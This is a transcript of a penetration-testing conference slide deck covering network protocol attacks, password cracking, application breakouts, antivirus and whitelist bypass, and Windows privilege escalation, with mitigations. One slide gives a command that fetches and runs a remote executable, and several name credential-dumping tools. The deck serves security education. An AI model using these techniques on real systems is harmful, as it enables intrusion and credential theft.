secure360 - attack all the layers! again!
DESCRIPTION
This presentation is intended to provide an overview of vulnerabilities and attack techniques that are popular in penetration testing at the moment. This talk includes real-world examples of attacks that they use on a daily basis, and some reflections on what techniques have changed over the last year. Vulnerabilities related to the application, network, and server layers will all be covered along with current anti-virus bypass and privilege escalation techniques used by attackers and penetration testers. This presentation should be interesting to security professionals and system administrators looking for more insight into real world attacks. More security blogs by the authors can be found @ https://www.netspi.com/blog/TRANSCRIPT
![Page 1: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/1.jpg)
AT
TA
CK
AL
L T
HE
LA
YE
RS
- A
GA
I N! :
WH
AT
’ S W
OR
KI N
G D
UR
I NG
PE
N T
ES
TS
SC
OT T
SU
TH
ER
L AN
D A
ND
KA
RL F
OS
AA
EN
MA
Y 1
4,
1: 3
0 P
M
![Page 2: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/2.jpg)
INTRODUCTIONS
Scott Sutherland Principal Security Consultant @ NetSPI Twitter: @_nullbind
Karl Fosaaen Senior Security Consultant @ NetSPI Twitter: @kfosaaen
We specialize in both things and stuff!
![Page 3: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/3.jpg)
OVERVIEW
• Why do companies pen test?
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows Escalation
• Conclusions
![Page 4: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/4.jpg)
WHY DO COMPANIES PEN TEST?
• Compliance requirements
• Evaluate risks associated with an acquisition or partnership
• Validate preventative controls
• Validate detective controls
• Prioritize internal security initiatives
• Proactively prevent breaches
![Page 5: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/5.jpg)
OVERVIEW
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows Escalation
![Page 6: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/6.jpg)
ATTACKING PROTOCOLS
• ARP: Address Resolution Protocol
• NBNS: NetBIOS Name Service
• SMB: Server Message Block
• PXE: Preboot Execution Environment
• DTP: Dynamic Trunking Protocol
![Page 7: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/7.jpg)
ATTACKING PROTOCOLS: ARP
Address Resolution Protocol
![Page 8: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/8.jpg)
ATTACKING PROTOCOLS: ARP
• General MAC to IP associationLayer 2
• Conditions Independent of user actionBroadcast network
• AttacksMITM MonitoringMITM InjectionDOS
![Page 9: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/9.jpg)
ATTACKING PROTOCOLS: ARP
![Page 10: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/10.jpg)
ATTACKING PROTOCOLS: ARP
Common mitigating controls:
• Dynamic ARP Inspection
• Port Security
• Static Routes (not recommended)
![Page 11: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/11.jpg)
ATTACKING PROTOCOLS: NBNS / LLMNR
NetBIOS Name Service
![Page 12: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/12.jpg)
ATTACKING PROTOCOLS: NBNS
• General IP to hostname association Layer 5 / 7
• Constraints Dependent on user action Broadcast Network Windows Only
• Attacks MITM Monitoring MITM Injection DOS
![Page 13: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/13.jpg)
ATTACKING PROTOCOLS: NBNS
![Page 14: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/14.jpg)
ATTACKING PROTOCOLS: NBNS
![Page 15: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/15.jpg)
ATTACKING PROTOCOLS: NBNS
![Page 16: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/16.jpg)
ATTACKING PROTOCOLS: NBNS
Common mitigating controls:• Create a WPAD (Web Proxy Auto-Discovery)
server entry in DNS
• Disable NBNS
• Disable insecure authentication methods to help
limit impact of exposed hashes
• Enable packet signing to help prevent
SMB Relay attacks
![Page 17: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/17.jpg)
ATTACKING PROTOCOLS: SMB
ServerMessageBlock
![Page 18: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/18.jpg)
ATTACKING PROTOCOLS: SMB
• GeneralSMB is the come back kid!Layer 7
• ConstraintsDependent on user actionAny routable networkNo connecting back to originating host
• AttacksCommand executionShells..aaand shells
![Page 19: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/19.jpg)
ATTACKING PROTOCOLS: SMB
![Page 20: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/20.jpg)
ATTACKING PROTOCOLS: SMB
Historically SMB Relay has been used to:
• Execute arbitrary commands
• Obtain shells
Lately the community has been developing tools for doing things like:
• LDAP queries
• SQL queries
• Exchange services
• Mounting file systems
![Page 21: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/21.jpg)
ATTACKING PROTOCOLS: SMB
Common mitigating controls:
• Enable packet signing to help prevent SMB Relay attacks
• Apply really old patches like if you missed out on the last decade…
![Page 22: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/22.jpg)
ATTACKING PROTOCOLS: PXE
PrebooteXecutionEnvironment
![Page 23: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/23.jpg)
ATTACKING PROTOCOLS: PXE
• GeneralDHCP
• AttacksRogue PXE serverCommand executionAccess to unencrypted drive imagesShells..aaand shells
![Page 24: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/24.jpg)
ATTACKING PROTOCOLS: PXE
Common mitigating controls:
• MAC/IP filters
• Limit PXE to specific networks
• Network Access Controls - NAC
![Page 25: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/25.jpg)
ATTACKING PROTOCOLS: DTP
Dynamic Trunking Protocol
![Page 26: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/26.jpg)
ATTACKING PROTOCOLS: DTP
Common mitigating controls:
• Use dedicated VLAN ID for all trunking ports
• Disable all unused ports and place them on a non routable VLAN
• Configure all user ports as access ports
to prevent trunk negotiation
• Configure frames with two 8021Q headers
• Configure strong VACLs
![Page 27: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/27.jpg)
ATTACKING PROTOCOLS: DTP
• General 802.1Q encapsulation is in use Layer 2
• Constraints Independent of user action Trunking is set to enabled or auto on switch port
• Attacks Monitor network traffic for all VLANs, because all VLANs are allowed on a trunk by default *Full VLAN hopping
![Page 28: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/28.jpg)
ATTACKING PROTOCOLS: DTP
![Page 29: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/29.jpg)
ATTACKING PROTOCOLS: DTP
![Page 30: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/30.jpg)
ATTACKING PROTOCOLS: DTP
![Page 31: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/31.jpg)
ATTACKING PROTOCOLS: DTP
![Page 32: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/32.jpg)
ATTACKING PROTOCOLS: DTP
Common mitigating controls:
• Use dedicated VLAN ID for all trunking ports
• Disable all unused ports and place them on a non routable VLAN
• Configure all user ports as access ports
to prevent trunk negotiation
• Configure frames with two 8021Q headers
• Configure strong VACLs
![Page 33: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/33.jpg)
OVERVIEW
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows Escalation
![Page 34: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/34.jpg)
ATTACKING PASSWORDS
• Hashes and Cracking (Offline)• Dictionary Attacks (Online)• Dump in Cleartext!
![Page 35: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/35.jpg)
ATTACKING PASSWORDS
Tool Function Year
Pass the Hash Passing Hashes 1997
Rainbow Tables Password Cracking 2000s
SMB Relay Relaying Captured Hashes 2001
John the Ripper Password Cracking 2001
NetNTLM.pl Cracking Network Hashes 2007
PTH Toolkit Pass all the Hashes 2008
Hashcat CPU and GPU Cracking 2010
WCE and Mimikatz Cleartext Windows Creds 2012
![Page 36: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/36.jpg)
ATTACKING PASSWORDS: DICTIONARY
• Online Vs. Offline Attacks• Dictionary Attacks
Enumerate users- Null SMB logins, RPC, *SID BF,
SNMP, LDAP, SharePoint, etcAttack!
• Are users getting smarter?Sort of… - “Spring2014” meets password complexity requirements
![Page 37: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/37.jpg)
ATTACKING PASSWORDS: HASHES
• What are hashes?A non-reversible way of storing passwordsOperating systems and applicationsLots of typesLM/NTLM
Network and Local MD5 SHA descrypt
![Page 38: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/38.jpg)
ATTACKING PASSWORDS: HASHES
• How do we get hashes?Cain and AbelfgdumpMetasploitMimikatzDatabasesConfig files
![Page 39: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/39.jpg)
ATTACKING PASSWORDS: CRACKING
• Cracking HashesRainbow TablesJohn the RipperoclHashcatCPU versus GPU
![Page 40: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/40.jpg)
ATTACKING PASSWORDS: CRACKING
Min
ute
s
0
100
200
300
400
500
600
Minutes for Six Character Brute Force
CPU GPU
9 Hou
rs
24
Seco
nds
![Page 41: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/41.jpg)
ATTACKING PASSWORDS: CRACKINGG
PU
CPU
![Page 42: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/42.jpg)
ATTACKING PASSWORDS: CLEARTEXT
Common application configsReversible Formats
Find in filesGroups.xmlUnattend.xmlSysprep
RegistryWCEMimikatz
![Page 43: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/43.jpg)
OVERVIEW
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows Escalation
![Page 44: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/44.jpg)
ATTACKING APPLICATIONS: COMMON
• Default and weak passwords
• SQL injection
• RFI/web shells
• Web directory traversals
• UNC path injection + SMB relay
• Critical missing patches
![Page 45: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/45.jpg)
ATTACKING APPLICATIONS: BREAKOUTS
• Obtain a common dialog box
• Bypass folder path and file type restrictions
• Bypass file execution restrictions
• Bypass file black/white lists
• Access to native consoles and management tools
• Downloading and use third party applications
![Page 46: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/46.jpg)
OVERVIEW
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows Escalation
![Page 47: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/47.jpg)
BYPASSING EPP: ANTI-VIRUS
• Powershell Code Injection
• Execute off network share
• Clone resource tables
• Modify import tables
• Pack files
![Page 48: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/48.jpg)
BYPASSING EPP: APP WHITE LIST
• Rename executables
• Execution via approved apps
- Powershell Code Injection
- Rundll32 mydll,DLLMain@12
- IEExec http://x.x.x.x:8080/bypass.exe
- cmd /c file.exe
• Directory Exceptions
• Disable Services
• Poisoning updates and approved file lists
![Page 49: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/49.jpg)
OVERVIEW
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows Escalation
![Page 50: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/50.jpg)
WINDOWS ESCALATION: OVERVIEW
• Privilege Escalation Goals• Local Privilege Escalation• Domain Privilege Escalation
![Page 51: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/51.jpg)
WINDOWS ESCALATION: GOALS
Local Escalation Goals Find clear text or reversible credentials with local administrative
privileges Get application to run commands as Administrator or LocalSystem
Domain Escalation Goals Find Domain Admins Impersonate Domain Admins
![Page 52: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/52.jpg)
WINDOWS ESCALATION: LOCAL
Local Escalation *Clear text credentials in files, registry, over network Insecure service paths DLL preloading DLL and exe replacement Binary planting in auto-run locations (reg and file system) Modifying schedule tasks *Local and remote exploits Leverage local application like IIS, SQL Server etc *UNC path injection + SMB Relay / Capture + crack
![Page 53: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/53.jpg)
WINDOWS ESCALATION: DOMAIN
Domain Escalation – Find DAs Check locally! (Processes,Tokens, Cachedump) Review active sessions - netsess Review remote processes - tasklist Service Principal Names (SPN) – get-spn Scanning Remote Systems for NetBIOS Information - nbtscan Pass the hash to other systems PowerShell shell spraying WINRM/WINRS shell spraying Psexec shell spraying
![Page 54: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/54.jpg)
WINDOWS ESCALATION: DOMAIN
Domain Escalation – Impersonate DAs
Dump passwords from memory with Mimikatz Migrate into the Domain Admin’s process Steal Domain Admins delegation tokens with Incognito Dump cached domain admin hashes with cachedump
Relatively new techniques PTH using Kerberos ticket
![Page 55: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/55.jpg)
![Page 56: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/56.jpg)
CONCLUSIONS
All can kind of be fixed
Most NetworksKind of broken
Most ProtocolsKind of broken
Most ApplicationsKind of broken
![Page 57: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/57.jpg)
ATTACK ALL THE LAYERS!
ANY QUESTIONS?
![Page 58: Secure360 - Attack All the Layers! Again!](https://reader036.vdocuments.us/reader036/viewer/2022062513/554b9f8fb4c905ae618b4906/html5/thumbnails/58.jpg)
ATTACK ALL THE LAYERS!
Scott SutherlandPrincipal Security ConsultantTwitter: @_nullbind
Karl FosaaenSenior Security ConsultantTwitter: @kfosaaen